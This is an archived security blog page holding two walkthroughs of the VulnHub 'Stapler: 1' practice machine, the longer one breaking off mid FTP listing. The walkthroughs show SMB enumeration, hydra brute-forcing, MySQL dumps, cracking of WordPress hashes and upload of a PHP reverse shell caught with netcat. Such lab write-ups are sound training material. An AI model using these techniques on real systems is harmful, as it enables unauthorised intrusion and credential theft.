Are you over 18 and want to see adult content?
More Annotations
A complete backup of sloanlongway.org
Are you over 18 and want to see adult content?
A complete backup of collegesummit.org
Are you over 18 and want to see adult content?
A complete backup of emeraldgrouppublishing.com
Are you over 18 and want to see adult content?
A complete backup of soildynamics.com
Are you over 18 and want to see adult content?
A complete backup of sofatinfertility.com
Are you over 18 and want to see adult content?
Favourite Annotations
A complete backup of quetengopati.blogspot.com
Are you over 18 and want to see adult content?
A complete backup of carteiradoestudante.com.br
Are you over 18 and want to see adult content?
A complete backup of ca-atlantique-vendee.fr
Are you over 18 and want to see adult content?
A complete backup of beurre-de-karite.net
Are you over 18 and want to see adult content?
A complete backup of keyka.typepad.com
Are you over 18 and want to see adult content?
A complete backup of polarnote.blogspot.com
Are you over 18 and want to see adult content?
Text
Skip to content
NEW BLOG URL: KONGWENBIN.COM NEW BLOG URL: KONGWENBIN.COMMenu
* Home
NEW BLOG URL AT KONGWENBIN.COM June 25, 2018June 25, 2018Wen Bin KONG
General blog
TL;DR
_This post is written to inform all visitors that this blog is no longer active and also to share my new blog’s URL at kongwenbin.com (URL) _ THANKS FOR VISITING MY BLOG Dear Subscribers, Readers and Fellow Security Enthusiasts who frequently visit my blog, be it: * To read my hacking walk-through or penetration testing write-ups * To look for write-ups on Capture-The-Flag (CTF) series * To seek inspiration and direction in the information securityindustry
* To seek career advise or read the review of Information Security related profession certifications * To explore learning resources in general * And much more other stuff, of course I would like to say a big THANK YOU to you for being so awesome! THIS BLOG HAS MOVED TO KONGWENBIN.COM I would like to share the news that this blog will no longer beactive.
All existing content has been moved to its new URL at https://kongwenbin.com and any future posts will be published overthere.
New Blog URL at https://kongwenbin.comWHY THE SWITCH
The reason is simple. I would like to * Setup my own theme instead of being limited to WordPress’sexisting options
* Install my own plugins as the free WordPress version doesn’t allow installation of plugins * More Motivation to blog. Well, who knows; I might post more frequently after I have accomplished item 1 & 2* Because I can
That’s all for this post, I’ll see you guys there then. Cheerios!SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window)*
LIKE THIS:
Like Loading... Leave a comment WRITE-UP FOR STAPLER: 1 – A DIFFERENT PATH April 30, 2018April 30, 2018Wen Bin KONG CTF
, Resources
CTF
, exploit
, hacking
, linux
, oscp
, privilege escalation, unix
, vm
, Vulnerabilities
, vulnhub
, wordpress
, writeup
This post is an addendum to my recent article on the Write-up forStapler: 1
. In
the original post, I gained a low privilege shell using credentials which I obtained through SMB enumeration. Remember I mentioned that I have not looked into port 3306 and 12380 yet and will look into them when I have some time? And I did — overthe last weekend
Once again, the short intro: Stapler: 1is a vulnerable
machine created by g0tmi1k and downloadable for free on VulnHub. It is a very good practice machine if you are pursuing the OSCP certification. (read about my OSCP journey).
ENUMERATION ON PORT 3306 The following was discovered through the initial nmap scan: > 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 Let’s try to connect to the service using netcat: > nc 192.168.117.136 3306> S
> 5.7.12-0ubuntu1
> -!:<-P#A|k-+:;JzV8*pZ|K/U*J];5P}hM-uJ%^+9=0SBQEh#ga_9:hJ’);>
> /**#@-*/
> /**
> * WordPress Database Table prefix.> *
> * You can have multiple installations in one database if you give> each a unique
> * prefix. Only numbers, letters, and underscores please!> */
> $table_prefix = ‘wp_’;> /**
> * For developers: WordPress debugging mode.> *
> * Change this to true to enable the display of notices during> development.
> * It is strongly recommended that plugin and theme developers use> WP_DEBUG
> * in their development environments.> */
> define(‘WP_DEBUG’, false); > /* That’s all, stop editing! Happy blogging. */ > /** Absolute path to the WordPress directory. */ > if ( !defined(‘ABSPATH’) ) > define(‘ABSPATH’, dirname(__FILE__) . ‘/’); > /** Sets up WordPress vars and included files. */ > require_once(ABSPATH . ‘wp-settings.php’); > define(‘WP_HTTP_BLOCK_EXTERNAL’, true); Now we have the credentials for MySQL! > mysql -uroot -pplbkac -h 192.168.117.136:12380>
> Warning: Using a password on the command line interface can be> insecure.
> Welcome to the MySQL monitor. Commands end with ; or \g. > Your MySQL connection id is 48 > Server version: 5.7.12-0ubuntu1 (Ubuntu) > Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights> reserved.
> Oracle is a registered trademark of Oracle Corporation and/or its > affiliates. Other names may be trademarks of their respective> owners.
> Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the > current input statement. > mysql> show databases; > +——————–+ > | Database | > +——————–+ > | information_schema | > | loot | > | mysql | > | performance_schema | > | phpmyadmin | > | proof | > | sys | > | wordpress | > +——————–+ > 8 rows in set (0.01 sec)>
> mysql> use wordpress; > Reading table information for completion of table and column names > You can turn off this feature to get a quicker startup with -A > Database changed > mysql> show tables; > +———————–+ > | Tables_in_wordpress | > +———————–+ > | wp_commentmeta | > | wp_comments | > | wp_links | > | wp_options | > | wp_postmeta | > | wp_posts | > | wp_term_relationships | > | wp_term_taxonomy | > | wp_terms | > | wp_usermeta | > | wp_users | > +———————–+ > 11 rows in set (0.00 sec) Check out the wp-users table: Now we check the list of users stored in this table: > mysql> select user_login,user_pass from wp_users; > +————+————————————+> | user_login |
> user_pass | > +————+————————————+ > | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | > | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | > | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | > | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | > | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | > | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | > | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | > | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | > | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | > | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | > | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | > | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | > | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | > | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | > | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | > | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | > +————+————————————+ > 16 rows in set (0.00 sec)> mysql> exit
> Bye
Great, now we have a list of password hashes! Next is to crack the password using john: > john –show hashes.txt>
> John:incorrect
> Elly:ylle
> barry:washere
> heather:passphrase> garry:football
> harry:monkey
> scott:cookie
> kathy:coolgirl
> tim:thumb
> ZOE:partyqueen
> Pam:0520
>
> 11 password hashes cracked, 5 left In this case, there is no need to wait for all the password hashes to be cracked because if you understand a WordPressapplication, usually the very first record in the user table is the admin account. In this case, the first record is John and we already have his password:incorrect
Using the following credentials, I was able to login to the WordPress application as an admin user:> username: john
> password: incorrect Next, go to Plugins and upload a Web Shell, such as the very famous Pentestmonkey’s PHP reverse shellwhich
is also available on your Kali Linux machine by default at /usr/share/webshells/php/php-reverse-shell.php Modify the ip and port parameters on line 49 and 50 and you are goodto go.
Save it as reverse.php and upload it as a new Plugin. Now, set up a netcat listener on the local port 4444 to catch the reverse shell from the Stapler machine.> nc -nlvp 4444
> listening on 4444 …Now, visit
https://192.168.117.136:12380/blogblog/wp-content/uploads/reverse.php to trigger the reverse shell connection. Observe the changes below on your host machine:> nc -lvnp 4444
> listening on 443 … > connect to from (UNKNOWN) 36962 > Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 > 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux 16:08:13 up 1 > day, 1:59, 0 users, load average: 0.00, 0.01, 0.05 > USER TTY FROM LOGIN@ IDLE JCPU PCPU> WHAT
> uid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: > can’t access tty; job control turned off> $ pwd
> /
> $ uname -a
> Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 > 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux With this, we have successfully gained entry using an alternative path of gaining low privilege shell through exploiting a vulnerable WordPress plugin to obtain its configuration file, obtained the SQL credentials to dump user password hashes, gain access to WordPress admin user account and uploaded a reverse shell. I hope you enjoyed reading this write-up. ------------------------- If you like this post, please check out my other similar write-ups aswell:
* Write-up for Stapler: 1 * Write-up for FristiLeaks v1.3 * Write-up for Kioptrix: 2014 (#5) * Write-up for Kioptrix: Level 1.3 (#4) * Write-up for Kioptrix: Level 1.2 (#3) * Write-up for Kioptrix: Level 1.1 (#2) * Write-up for Kioptrix: Level 1 (#1)SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window)*
LIKE THIS:
Like Loading... 1 Comment WRITE-UP FOR STAPLER: 1 April 22, 2018April 30, 2018Wen Bin KONG CTF
, Resources
CTF
, exploit
, hacking
, kali
, kernel
, linux
, oscp
, privesc
, privilege escalation,
Resources , smb
, tools
, tutorial
, vulnhub
, Web
, writeup
This is another write-up for a VulnHub machine, Stapler: 1 . It’s a vulnerable machine created by g0tmi1k, a pretty famous person amongst folks who have completed their OSCPjourney
(read about my OSCP journey).
After downloading the machine, read the content of Stapler_readme.txt. It says that there are at least 2 different paths to getting a limited shell and at least 3 different ways to getting a root shell. Well, this sounds pretty exciting. Let’s get started!HOST DISCOVERY
Use netdiscover to identify any host in my network: > $ ifconfig eth0 | grep -i 192.168.117>
> inet 192.168.117.134 netmask 255.255.255.0 broadcast 192.168.117.255>
> $ netdiscover -r 192.168.117.0/24>
>
> 192.168.117.136 00:0c:29:3b:8b:40 1 60 Unknown vendor >
SERVICE DISCOVERY
> nmap -sS -Pn -T4 -p- 192.168.117.136>
> PORT STATE SERVICE > 21/tcp open ftp > 22/tcp open ssh > 53/tcp open domain > 80/tcp open http > 139/tcp open netbios-ssn > 666/tcp open doom > 3306/tcp open mysql > 12380/tcp open unknown That is quite a number of services! Now, to get their exact version number, we run the following: > nmap -Pn -T4 -O -A -p21,22,53,80,139,666,3306,12380 192.168.117.136>
>
> PORT STATE SERVICE VERSION > 21/tcp open ftp vsftpd 2.0.8 or later > | ftp-anon: Anonymous FTP login allowed (FTP code 230) > |_Can’t get directory listing: Can’t parse PASV response: > “Permission denied.” > 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 > (Ubuntu Linux; protocol 2.0) > | ssh-hostkey:
> | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) > | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) > |_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA) > 53/tcp open domain dnsmasq 2.75> | dns-nsid:
> |_ bind.version: dnsmasq-2.75 > 80/tcp open http PHP cli server 5.5 or> later
> |_http-title: 404 Not Found > 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup:> WORKGROUP)
> 666/tcp open doom? > | fingerprint-strings:> | NULL:
> | message2.jpgUT> | QWux
> | “DL[E> | #;3[
> | \xf6
> | u(+[KN\x17\x0F~q > |_ Auth Plugin Name: 88 > 12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))>
> |_http-server-header: Apache/2.4.18 (Ubuntu) > |_http-title: Tim, we need to-do better next year for Initech>
> Device type: general purposeRunning: Linux 3.X|4.X > OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 > OS details: Linux 3.10 – 4.8, Linux 3.16 – 4.6, Linux 3.2 – > 4.8
> Network Distance: 1 hop > Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel > Host script results: > |_clock-skew: mean: 7h59m23s, deviation: 0s, median: 7h59m23s > |_nbstat: NetBIOS name: RED, NetBIOS user:>
Just looking at the output, I can already see several ways to gain a foothold into the target server. _Please note that this write-up may not cover ALL the possible ways to gaining root on this box. However, I strongly encourage you to try to find all possible ways for the sake of learning._ ENUMERATION ON PORT 80 Let’s look at port 80: > 80/tcp open http PHP cli server 5.5 or later Seems like nothing is there. Run directory buster and see if there are any low hanging fruits. > dirb http://192.168.117.136 >
>
> —- Scanning URL: http://192.168.117.136/ —- > + http://192.168.117.136/.bashrc (CODE:200|SIZE:3771) > + http://192.168.117.136/.profile (CODE:200|SIZE:675) >
Download both files to see their content: > wget http://192.168.117.136/.profile > wget http://192.168.117.136/.bashrc After reviewing their content, I can conclude that there isn’t anything interesting there. ENUMERATION ON PORT 666 > 666/tcp open doom? Now, let’s connect to port 666 to see what it is: Wow. Just. Wow. What was this? Although there was a message2.jpg being mentioned at the start of its content, it was confirmed that this is not an image. Let’s not dwell too long on this. ENUMERATION ON PORT 139 > 139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: > WORKGROUP)
When I see SMB service running on a Linux box, I will run enum4linux to check things out: > enum4linux -a 192.168.117.136>
>
> ======================================== > | Session Check on 192.168.117.136 | > ======================================== > Server 192.168.117.136 allows sessions using username ”, > password ”
>
> ========================================= > | OS information on 192.168.117.136 | > ========================================= > Got OS info for 192.168.117.136 from srvinfo: > RED Wk Sv PrQ Unx NT SNT red server> (Samba, Ubuntu)
> platform_id : 500 > os version : 6.1 > server type : 0x809a03>
> ============================================ > | Share Enumeration on 192.168.117.136 | > ============================================ > WARNING: The “syslog” option is deprecated > Sharename Type Comment > ——— —- ——- > print$ Disk Printer Drivers > kathy Disk Fred, What are we> doing here?
> tmp Disk All temporary > files should be stored here > IPC$ IPC IPC Service > (red server (Samba, Ubuntu)) > Server Comment > ——— ——- > Workgroup Master > ——— ——- > WORKGROUP RED>
> Attempting to map shares on 192.168.117.136 > //192.168.117.136/print$ Mapping: DENIED, Listing: N/A > //192.168.117.136/kathy Mapping: OK, Listing: OK > //192.168.117.136/tmp Mapping: OK, Listing: OK > //192.168.117.136/IPC$ Mapping: OK Listing: DENIED>
> ==========================================================================>
> | Users on 192.168.117.136 via RID cycling (RIDS: > 500-550,1000-1050) | > ==========================================================================>
> Found new SID: S-1-22-1 > Found new SID: S-1-5-21-864226560-67800430-3082388513 > Found new SID: S-1-5-32>
> Enumerating users using SID S-1-5-32 and logon username ”,> password ”
>
> S-1-5-32-544 BUILTIN\Administrators (Local Group) > S-1-5-32-545 BUILTIN\Users (Local Group) > S-1-5-32-546 BUILTIN\Guests (Local Group) > S-1-5-32-547 BUILTIN\Power Users (Local Group) > S-1-5-32-548 BUILTIN\Account Operators (Local Group) > S-1-5-32-549 BUILTIN\Server Operators (Local Group) > S-1-5-32-550 BUILTIN\Print Operators (Local Group) >
>
> Enumerating users using SID > S-1-5-21-864226560-67800430-3082388513 and logon username ”,> password ”
>
> S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User) >
> S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group) >
>
> Enumerating users using SID S-1-22-1 and logon username ”,> password ”
> S-1-22-1-1000 Unix User\peter (Local User) > S-1-22-1-1001 Unix User\RNunemaker (Local User) > S-1-22-1-1002 Unix User\ETollefson (Local User) > S-1-22-1-1003 Unix User\DSwanger (Local User) > S-1-22-1-1004 Unix User\AParnell (Local User) > S-1-22-1-1005 Unix User\SHayslett (Local User) > S-1-22-1-1006 Unix User\MBassin (Local User) > S-1-22-1-1007 Unix User\JBare (Local User) > S-1-22-1-1008 Unix User\LSolum (Local User) > S-1-22-1-1009 Unix User\IChadwick (Local User) > S-1-22-1-1010 Unix User\MFrei (Local User) > S-1-22-1-1011 Unix User\SStroud (Local User) > S-1-22-1-1012 Unix User\CCeaser (Local User) > S-1-22-1-1013 Unix User\JKanode (Local User) > S-1-22-1-1014 Unix User\CJoo (Local User) > S-1-22-1-1015 Unix User\Eeth (Local User) > S-1-22-1-1016 Unix User\LSolum2 (Local User) > S-1-22-1-1017 Unix User\JLipps (Local User) > S-1-22-1-1018 Unix User\jamie (Local User) > S-1-22-1-1019 Unix User\Sam (Local User) > S-1-22-1-1020 Unix User\Drew (Local User) > S-1-22-1-1021 Unix User\jess (Local User) > S-1-22-1-1022 Unix User\SHAY (Local User) > S-1-22-1-1023 Unix User\Taylor (Local User) > S-1-22-1-1024 Unix User\mel (Local User) > S-1-22-1-1025 Unix User\kai (Local User) > S-1-22-1-1026 Unix User\zoe (Local User) > S-1-22-1-1027 Unix User\NATHAN (Local User) > S-1-22-1-1028 Unix User\www (Local User) > S-1-22-1-1029 Unix User\elly (Local User)>
Well, that is a lot of information! First, let’s store the list of possible usernames identified using SID S-1-22-1 and login username ”, password ” — the last part of the above output. There may be a situation when you need to use them to brute force attack some service, such as ssh. > $ cat userlist.txt > S-1-22-1-1000 Unix User\peter (Local User) > S-1-22-1-1001 Unix User\RNunemaker (Local User) > S-1-22-1-1002 Unix User\ETollefson (Local User) > S-1-22-1-1003 Unix User\DSwanger (Local User) > S-1-22-1-1004 Unix User\AParnell (Local User) > S-1-22-1-1005 Unix User\SHayslett (Local User) > S-1-22-1-1006 Unix User\MBassin (Local User) > S-1-22-1-1007 Unix User\JBare (Local User) > S-1-22-1-1008 Unix User\LSolum (Local User) > S-1-22-1-1009 Unix User\IChadwick (Local User) > S-1-22-1-1010 Unix User\MFrei (Local User) > S-1-22-1-1011 Unix User\SStroud (Local User) > S-1-22-1-1012 Unix User\CCeaser (Local User) > S-1-22-1-1013 Unix User\JKanode (Local User) > S-1-22-1-1014 Unix User\CJoo (Local User) > S-1-22-1-1015 Unix User\Eeth (Local User) > S-1-22-1-1016 Unix User\LSolum2 (Local User) > S-1-22-1-1017 Unix User\JLipps (Local User) > S-1-22-1-1018 Unix User\jamie (Local User) > S-1-22-1-1019 Unix User\Sam (Local User) > S-1-22-1-1020 Unix User\Drew (Local User) > S-1-22-1-1021 Unix User\jess (Local User) > S-1-22-1-1022 Unix User\SHAY (Local User) > S-1-22-1-1023 Unix User\Taylor (Local User) > S-1-22-1-1024 Unix User\mel (Local User) > S-1-22-1-1025 Unix User\kai (Local User) > S-1-22-1-1026 Unix User\zoe (Local User) > S-1-22-1-1027 Unix User\NATHAN (Local User) > S-1-22-1-1028 Unix User\www (Local User) > S-1-22-1-1029 Unix User\elly (Local User) Let’s do some basic amendment to turn this into a proper list of only usernames.
> cat userlist.txt | cut -d”\\” -f2 | cut -d” ” -f1 >> users.txt
Now you have a nice list> cat users.txt
> peter
> RNunemaker
> ETollefson
> DSwanger
> AParnell
> SHayslett
> MBassin
> JBare
> LSolum
> IChadwick
> MFrei
> SStroud
> CCeaser
> JKanode
> CJoo
> Eeth
> LSolum2
> JLipps
> jamie
> Sam
> Drew
> jess
> SHAY
> Taylor
> mel
> kai
> zoe
> NATHAN
> www
> elly
Back to the enum4linux output, this line is particularly interesting > kathy Disk Fred, What are we doing here? Let’s connect directly to the drives to check out the content usingsmbclient:
> smbclient -L 192.168.117.136 -N>
> Sharename Type Comment > ——— —- ——- > print$ Disk Printer Drivers > kathy Disk Fred, What are we> doing here?
> tmp Disk All temporary > files should be stored here > IPC$ IPC IPC Service > (red server (Samba, Ubuntu)) > Server Comment > ——— ——- > Workgroup Master > ——— ——- > WORKGROUP RED And now further proceed to read the content in kathy: > smbclient //192.168.117.136/kathy -N>
> smb: \>
> ls . D 0 Sat > Jun 4 00:52:52 2016 > .. D 0 Tue > Jun 7 05:39:56 2016 > kathy_stuff D 0 Sun > Jun 5 23:02:27 2016 > backup D 0 Sun > Jun 5 23:04:14 2016 Inside kathy_stuff , there is only 1 text file, but we do not have the access to read its content. > smb: \kathy_stuff\> print todo-list.txt > NT_STATUS_ACCESS_DENIED opening remote file todo-list.txt The same goes for the backup directory. I don’t have any access to view its content, even though I know that once I gain access to it, I can probably view the password of the FTP server through the vsftpdconfiguration file
> smb: \backup\> ls > . D 0 Sun > Jun 5 23:04:14 2016 > .. D 0 Sat > Jun 4 00:52:52 2016 > vsftpd.conf N 5961 Sun > Jun 5 23:03:45 2016 > wordpress-4.tar.gz N 6321767 Tue > Apr 28 01:14:46 2015 > 19478204 blocks of size 1024. 16396604 blocks> available
> smb: \backup\> print vsftpd.conf > NT_STATUS_ACCESS_DENIED opening remote file vsftpd.conf > smb: \backup\> print wordpress-4.tar.gz > NT_STATUS_ACCESS_DENIED opening remote file wordpress-4.tar.gz I wonder where is the WordPress being deployed at though. Interesting. For now, let’s move on to the next service. _If you noticed, I am moving on quickly from each discovered services during my enumeration phase._ When performing security assessment or “hacking”, it is very important to understand your target. it’s also called ENUMERATION. If you try hard enough in your enumeration, you will find something. This is exactly what I am doing now. One tip though, try your best to not get stuck on something for too long, keep moving, be agile. ENUMERATION ON PORT 21 Let’s look at other services, such as FTP server: > 21/tcp open ftp vsftpd 2.0.8 or later > | ftp-anon: Anonymous FTP login allowed (FTP code 230) > |_Can’t get directory listing: Can’t parse PASV response: > “Permission denied.” Connecting to the service using telnet. I know I can log in because nmaphas been a great help by helping to check if anonymous FTP loginis allowed
> $ ftp 192.168.117.136 21>
> Connected to 192.168.117.136.> 220-
> 220-|—————————————————————————————–|>
> 220-| Harry, make sure to update the banner when you get a chance to > show who has access here | > 220-|—————————————————————————————–|>
> 220-
> 220
> Name (192.168.117.136:root): anonymous > 331 Please specify the password.> Password:
> 230 Login successful. > Remote system type is UNIX. > Using binary mode to transfer files.> ftp> ls
> 200 PORT command successful. Consider using PASV. > 150 Here comes the directory listing. > -rw-r–r– 1 > 0 0 107 Jun 03 2016 note > 226 Directory send OK. Smooth. Let’s download see what is stored in the note.> ftp> get note
> local: note remote: note > 200 PORT command successful. Consider using PASV. > 150 Opening BINARY mode data connection for note (107 bytes). > 226 Transfer complete. > 107 bytes received in 0.00 secs (49.0343 kB/s)> ftp> exit
> 221 Goodbye.
I will laugh if they store a username and password directly in thisfile.
> $ cat note
>
> Elly, make sure you update the payload information. Leave it in your > FTP account once your are done, John Seems like Elly has some “payload information” stored in her FTPaccount.
Since we REALLY want to gain access to Elly’s FTP account, let’s try to brute force using the list we got earlier. > hydra -L users.txt -P users.txt 192.168.117.136 ftp>
>
> host: 192.168.117.136 login: SHayslett password: > SHayslett
> OMG seriously? There really is a credential that works this way. > username:SHayslett > password:SHayslett Let’s connect using FTP: > root@kali:/tmp/stapler1# ftp 192.168.117.136 > Connected to 192.168.117.136. > 220-
> 220-|—————————————————————————————–| >
> 220-| Harry, make sure to update the banner when you get a chance to > show who has access here | > 220-|—————————————————————————————–| >
> 220-
> 220
> Name (192.168.117.136:root): SHayslett > 331 Please specify the password. > Password:
> 230 Login successful. > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> ls
> 200 PORT command successful. Consider using PASV. > 150 Here comes the directory listing. > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 X11 > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 acpi > -rw-r–r– 1 0 0 3028 > Apr 20 2016 adduser.conf > -rw-r–r– 1 > 0 0 51 Jun 03 2016 > aliases
> -rw-r–r– 1 0 0 12288 > Jun 03 2016 aliases.db > drwxr-xr-x 2 0 0 4096 > Jun 07 2016 alternatives > drwxr-xr-x 8 0 0 4096 > Jun 03 2016 apache2 > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 apparmor > drwxr-xr-x 9 0 0 4096 > Jun 06 2016 apparmor.d > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 apport > drwxr-xr-x 6 0 0 4096 > Jun 03 2016 apt > -rw-r—– 1 0 1 144 > Jan 14 2016 at.deny > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 authbind > -rw-r–r– 1 0 0 2188 > Aug 31 2015 bash.bashrc > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 bash_completion.d > -rw-r–r– 1 > 0 0 367 Jan 27 2016 > bindresvport.blacklist > drwxr-xr-x 2 0 0 4096 > Apr 12 2016 binfmt.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 byobu > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 ca-certificates > -rw-r–r– 1 0 0 7788 > Jun 03 2016 ca-certificates.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 console-setup > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.daily > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.hourly > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.monthly > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.weekly > -rw-r–r– 1 > 0 0 722 Apr 05 2016 > crontab
> -rw-r–r– 1 > 0 0 54 Jun 03 2016 > crypttab
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 dbconfig-common > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 dbus-1 > -rw-r–r– 1 0 0 2969 > Nov 10 2015 debconf.conf > -rw-r–r– 1 > 0 0 12 Apr 30 2015 > debian_version
> drwxr-xr-x 3 0 0 4096 > Jun 05 2016 default > -rw-r–r– 1 > 0 0 604 Jul 02 2015 > deluser.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 depmod.d > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 dhcp > -rw-r–r– 1 0 0 26716 > Jul 30 2015 dnsmasq.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 dnsmasq.d > drwxr-xr-x 4 0 0 4096 > Jun 07 2016 dpkg > -rw-r–r– 1 > 0 0 96 Apr 20 2016 > environment
> drwxr-xr-x 4 0 0 4096 > Jun 03 2016 fonts > -rw-r–r– 1 > 0 0 594 Jun 03 2016 fstab >
> -rw-r–r– 1 > 0 0 132 Feb 10 2016 > ftpusers
> -rw-r–r– 1 > 0 0 280 Jun 20 2014 > fuse.conf
> -rw-r–r– 1 0 0 2584 > Feb 18 2016 gai.conf > -rw-rw-r– 1 0 0 1253 > Jun 04 2016 group > -rw——- 1 0 0 1240 > Jun 03 2016 group- > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 grub.d > -rw-r—– 1 0 42 1004 > Jun 04 2016 gshadow > -rw——- 1 0 0 995 > Jun 03 2016 gshadow- > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 gss > -rw-r–r– 1 > 0 0 92 Oct 22 2015 > host.conf
> -rw-r–r– 1 > 0 0 12 Jun 03 2016 > hostname
> -rw-r–r– 1 > 0 0 469 Jun 05 2016 hosts >
> -rw-r–r– 1 > 0 0 411 Jun 03 2016 > hosts.allow
> -rw-r–r– 1 > 0 0 711 Jun 03 2016 > hosts.deny
> -rw-r–r– 1 0 0 1257 > Jun 03 2016 inetd.conf > drwxr-xr-x 2 0 0 4096 > Feb 06 2016 inetd.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 init > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 init.d > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 initramfs-tools > -rw-r–r– 1 0 0 1748 > Feb 04 2016 inputrc > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 insserv > -rw-r–r– 1 > 0 0 771 Mar 06 2015 > insserv.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 insserv.conf.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 iproute2 > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 iptables > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 iscsi > -rw-r–r– 1 > 0 0 345 Dec 17 15:27 issue > -rw-r–r– 1 > 0 0 197 Jun 03 2016 > issue.net
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 kbd > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 kernel > -rw-r–r– 1 > 0 0 144 Jun 03 2016 > kernel-img.conf
> -rw-r–r– 1 0 0 26754 > Jun 07 2016 ld.so.cache > -rw-r–r– 1 > 0 0 34 Jan 27 2016 > ld.so.conf
> drwxr-xr-x 2 0 0 4096 > Jun 07 2016 ld.so.conf.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 ldap > -rw-r–r– 1 > 0 0 267 Oct 22 2015 legal >
> -rw-r–r– 1 > 0 0 191 Jan 18 2016 > libaudit.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 libnl-3 > drwxr-xr-x 4 0 0 4096 > Jun 06 2016 lighttpd > -rw-r–r– 1 0 0 2995 > Apr 14 2016 locale.alias > -rw-r–r– 1 0 0 9149 > Jun 03 2016 locale.gen > -rw-r–r– 1 0 0 3687 > Jun 03 2016 localtime > drwxr-xr-x 6 0 0 4096 > Jun 03 2016 logcheck > -rw-r–r– 1 0 0 10551 > Mar 29 2016 login.defs > -rw-r–r– 1 > 0 0 703 May 06 2015 > logrotate.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 logrotate.d > -rw-r–r– 1 > 0 0 103 Apr 12 2016 > lsb-release
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 lvm > -r–r–r– 1 > 0 0 33 Jun 03 2016 > machine-id
> -rw-r–r– 1 > 0 0 111 Nov 20 2015 magic >
> -rw-r–r– 1 > 0 0 111 Nov 20 2015 > magic.mime
> -rw-r–r– 1 0 0 2579 > Jun 03 2016 mailcap > -rw-r–r– 1 > 0 0 449 Oct 30 2015 > mailcap.order
